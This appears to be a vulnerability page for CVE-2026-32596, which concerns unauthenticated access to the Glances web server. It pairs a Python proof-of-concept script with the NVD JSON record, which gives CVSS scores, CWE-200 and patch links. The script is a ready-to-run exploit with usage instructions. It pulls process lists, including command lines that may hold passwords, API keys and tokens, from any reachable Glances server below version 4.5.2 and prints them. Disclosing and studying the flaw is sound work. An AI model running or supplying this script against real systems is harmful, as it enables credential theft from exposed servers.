CVE-2026-32596

# CVE-2026-32596 PoC - Glances Web Server Unauthorized Access # This PoC demonstrates accessing the Glances REST API without authentication import requests import json import sys def check_glances_version(target_url): """Check Glances version""" try: response = requests.get(f"{target_url}/api/3/all", timeout=10) if response.status_code == 200: data = response.json() version = data.get('glances', {}).get('version', 'Unknown') return version except Exception as e: return None def extract_sensitive_info(target_url): """Extract process information including credentials from Glances API""" endpoints = [ '/api/3/processlist', '/api/3/processlistall', '/api/3/all' ] results = [] for endpoint in endpoints: try: response = requests.get(f"{target_url}{endpoint}", timeout=10) if response.status_code == 200: data = response.json() results.append({ 'endpoint': endpoint, 'data': data }) except Exception as e: print(f"Error accessing {endpoint}: {e}") return results def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-32596-poc.py <target_url>") print("Example: python cve-2026-32596-poc.py http://192.168.1.100:61208") sys.exit(1) target_url = sys.argv[1].rstrip('/') print(f"[*] Targeting: {target_url}") # Check version version = check_glances_version(target_url) if version: print(f"[+] Glances version: {version}") else: print("[-] Could not determine version or connect to target") sys.exit(1) # Extract sensitive information print("[*] Extracting process information...") results = extract_sensitive_info(target_url) if results: print(f"[+] Found {len(results)} accessible endpoints") for result in results: print(f"\n[+] Data from {result['endpoint']}:") print(json.dumps(result['data'], indent=2)) else: print("[-] No accessible endpoints found") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-32596", "sourceIdentifier": "[email protected]", "published": "2026-03-18T06:16:18.800", "lastModified": "2026-03-18T18:33:12.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistemas multiplataforma de código abierto. Antes de la versión 4.5.2, el servidor web de Glances se ejecuta sin autenticación por defecto cuando se inicia con 'glances -w', exponiendo la API REST con información sensible del sistema, incluyendo líneas de comando de procesos que contienen credenciales (contraseñas, claves de API, tokens) a cualquier cliente de red. La versión 4.5.2 soluciona el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/208d876118fea5758970f33fd7474908bd403d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-wvxv-4j8q-4wjq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}